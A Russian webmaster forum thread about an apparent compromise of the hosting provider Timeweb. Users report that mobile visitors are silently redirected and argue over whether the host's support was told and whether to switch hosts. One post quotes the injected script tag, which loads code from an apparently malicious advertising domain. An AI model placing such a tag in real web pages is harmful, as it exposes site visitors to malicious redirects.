timeweb.ru взломан?

B
На сайте с 23.06.2013
Offline
16
#21

Вообщем, ребята, сдается мне что самое время валить с этого хостинга. Потому что тут явно не сам сайт заражён....

HM
На сайте с 14.01.2012
Offline
223
#22

проверил свои сайты, подтверждаю

при просмотре с мобильным юзерагентом и уникальным ip в сорцах страницы такое:

<script type="text/javascript" src="http://ads.sdnsistems.net/mob.php?17657216209"></script></head>

хостер таймвеб

globalmoney
На сайте с 09.12.2005
Offline
390
#23
Kalian:
Вот только как удалить его пока так и не понял.

Сами Вы ни чего не сделаете, это должен делать Ваш хостер.

MGNHost.ru - полный комплекс хостинг услуг ( https://www.mgnhost.ru ) VPS/VDS на SSD дисках в России / Нидерландах / США от 210 рублей ( https://www.mgnhost.ru/vds.php )
toltop
На сайте с 23.06.2013
Offline
45
#24
globalmoney:
Сами Вы ни чего не сделаете, это должен делать Ваш хостер.

Тонкий намек, что у вас такое уже бы устранили?

Если -- да, то идем читать ваши тарифы и условия

globalmoney
На сайте с 09.12.2005
Offline
390
#25
toltop:
Тонкий намек, что у вас такое уже бы устранили?
Если -- да, то идем читать ваши тарифы и условия

Это намёк на то, что в данном случае для решения проблемы нужен root доступ к серверу, которого нет у клиента и соответственно клиент сам ни чего не сможет исправить.

Ни разу с таким не сталкивались, поэтому сказать сколько это займёт у нас времени не могу, но в случае, если бы не удалось быстро решить проблему, перенесли бы клиентов на другой сервер, а потом уже разбирались бы с проблемным сервером.

H
На сайте с 12.05.2007
Offline
133
#26

В общем как я и ожидал...

Сначала ТС (с дивной репой) создает тему "на хостинге случилось что-то", почему-то не уведомляя об этом "чем-то" техподдержку хостинга.

Потом набегает кучка однопостовых троллей с криками "пора валить".... к каким-то случайно выбраным значительно более школохостам.

В промежутке - вопрос об этичности. До спрашивающего может быть уже дошло в чем она (не этичность) заключается?

hvosting.ua (http://hvosting.ua/)
HM
На сайте с 14.01.2012
Offline
223
#27

hvosting, я отписал тикет саппорту, валить никуда не призывал.

но проблема на самом деле есть.

более того, не так давно несколько знакомых жаловались на такой же вредный код (и домен тот же) на своих арендованных серверах.

а этот тред нужен хотя бы для того, чтобы не терять время на "проверьте свой компьютер на вирусы, а CMS на уязвимости".

код инклюдится даже в одностраничники на html. причем не вставляется напрямую в исходники страницы, а подгружается вебсервером на лету.

toltop
На сайте с 23.06.2013
Offline
45
#28
hvosting:
В общем как я и ожидал...

Сначала ТС (с дивной репой) создает тему "на хостинге случилось что-то", почему-то не уведомляя об этом "чем-то" техподдержку хостинга.

Потом набегает кучка однопостовых троллей с криками "пора валить".... к каким-то случайно выбраным значительно более школохостам.

В промежутке - вопрос об этичности. До спрашивающего может быть уже дошло в чем она (не этичность) заключается?

Ничего подобного

Я набежала по причине того, что вечером в сб обнаружила эти злосчастные редиректы при проверки позиций сайта в я с планшета

До этого причин региться не было так как почитывала на этом форуме, в основном, впечатления коллег об апах

Вчера же вечером написали в техподдержку

Утром обнаружила публикации на подобные мобильные редиректы в других источниках (не только на этом форуме)

Проблема абсолютно реальная и проверить её элементарно

Пострадали сайты, размещенные на разных серверах ТаймВеба

Внутри сайтов ничего подозрительного не нашли

Естественно, нас беспокоит проблема, решить которую может только сам хостер

Мы в этой ситуации - беспомощные клиентские агнецы

Понимаю, что набежавшие подозрительные юзеры выглядят неубедительно, но в жизни и так бывает

Оказывается

Обидно, то в целом ТаймВеб нас абсолютно устраивает по всем параметрам и уходить мы, в принципе, не планируем -(

Но мобильные редиректы - как кость в горле

H
На сайте с 12.05.2007
Offline
133
#29

Да я уже понял, что меня не вполне поняли. :)

То что новость _вероятно_ не фейк я догадался (на фразе "проверил свои сайты, подтверждаю" ).

Однако теме уже почти 2-е суток, а саппорт таймвеба узнал о проблеме несколько позже.

В любом случае НЕ сообщать хостеру о проблеме - это тупо.

B
На сайте с 23.06.2013
Offline
16
#30
toltop:
Ничего подобного
Я набежала по причине того, что вечером в сб обнаружила эти злосчастные редиректы при проверки позиций сайта в я с планшета....

Я тоже нашёл этот топик в поисковике по запросу "хостинг таймвеб взломали". И я реальный пользователь, а не какой-то там троль и я даже пост в блог написал на эту тему. http://zarabotokvseti.net/novosti/xosting-tajmveb-vzlomali.html

А оставаться на этом хостинге я не планирую, и не потому что их смогли взломать, а потому что уже три дня не могут починить.

---------- Добавлено 23.06.2013 в 15:10 ----------

hvosting:
Да я уже понял, что меня не вполне поняли. :)
То что новость _вероятно_ не фейк я догадался (на фразе "проверил свои сайты, подтверждаю" ).

Однако теме уже почти 2-е суток, а саппорт таймвеба узнал о проблеме несколько позже.
В любом случае НЕ сообщать хостеру о проблеме - это тупо.

Я сообщил в первый же день, мне указали пальцем что это мои проблемы, мягко говоря, грубо выражаясь.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий